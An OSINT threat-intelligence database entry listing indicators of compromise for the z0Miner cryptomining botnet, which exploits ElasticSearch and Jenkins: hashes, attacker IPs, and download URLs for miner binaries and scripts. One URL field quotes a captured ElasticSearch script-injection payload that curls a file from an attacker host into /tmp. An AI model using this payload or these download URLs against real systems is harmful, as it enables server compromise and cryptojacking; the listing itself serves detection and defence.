ioc[.]one - OSINT Cyber Threat Intelligence Database

Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities

Tags

country:	Netherlands
attack-pattern:	Botnet - T1583.005 Botnet - T1584.005 Cron - T1053.003 Vulnerabilities - T1588.006

Show in Graph

Common Information

Type	Value
UUID	9673d48a-c27a-48f7-8dfe-04e70bafb2ea
Fingerprint	aca119809d979b8d
Analysis status	DONE
Considered CTI value	2
Text language
Published	March 8, 2021, midnight
Added to db	Sept. 11, 2022, 12:42 p.m.
Last updated	Nov. 17, 2024, 6:53 p.m.
Headline	Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities
Title	Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities
Detected Hints/Tags/Attributes	29/2/27

Source URLs

	Redirection	Url
Details	Source	https://blog.netlab.360.com/threat-alert-z0miner-is-spreading-quickly-by-exploiting-elasticsearch-and-jenkins-vulnerabilities/

URL Provider

Details	Provider	Source level domain
Details	360.com	blog.netlab.360.com

Attributes

Details	Type	#Events	Value
Details	CVE	17	cve-2015-1427
Details	Domain	42	tencent.com
Details	Domain	358	pastebin.com
Details	Domain	10	solr.sh
Details	File	1	1170.html
Details	File	5	conf.txt
Details	File	1	z0.txt
Details	File	153	config.json
Details	File	87	java.exe
Details	File	23	xmrig.exe
Details	md5	1	84417ff134484bb8ce4ff567574beaa5
Details	md5	1	c1dcc75d729e31833892cb649f450568
Details	md5	1	adb190c4e90cc61ca266cfda355826df
Details	md5	1	d833fc2ced5d0791a404ced14ecf4e20
Details	md5	1	26a91e9a94c7f8d966de1541095a3d92
Details	md5	1	373b018bef17e04d8ff29472390403f9
Details	IPv4	7	27.1.1.34
Details	IPv4	1	178.62.202.152
Details	Url	1	https://s.tencent.com/research/report/1170.html
Details	Url	1	http://27.1.1.34:8080/docs/conf.txt
Details	Url	1	http://27.1.1.34:8080/docs/conf.txt+-o+/tmp/solr".execute().text&json={"script":+"println+\"curl+-fssl+http://27.1.1.34:8080/docs/conf.txt+-o+/tmp/solr\".execute().text
Details	Url	1	https://pastebin.com/raw/4rb51qkw
Details	Url	1	https://pastebin.com/raw/bwd1bcxt
Details	Url	2	http://27.1.1.34:8080/docs/config.json
Details	Url	1	http://178.62.202.152:8080/wuck/java.exe
Details	Url	1	http://27.1.1.34:8080/docs/solr.sh
Details	Url	1	http://178.62.202.152:8080/wuck/xmrig.exe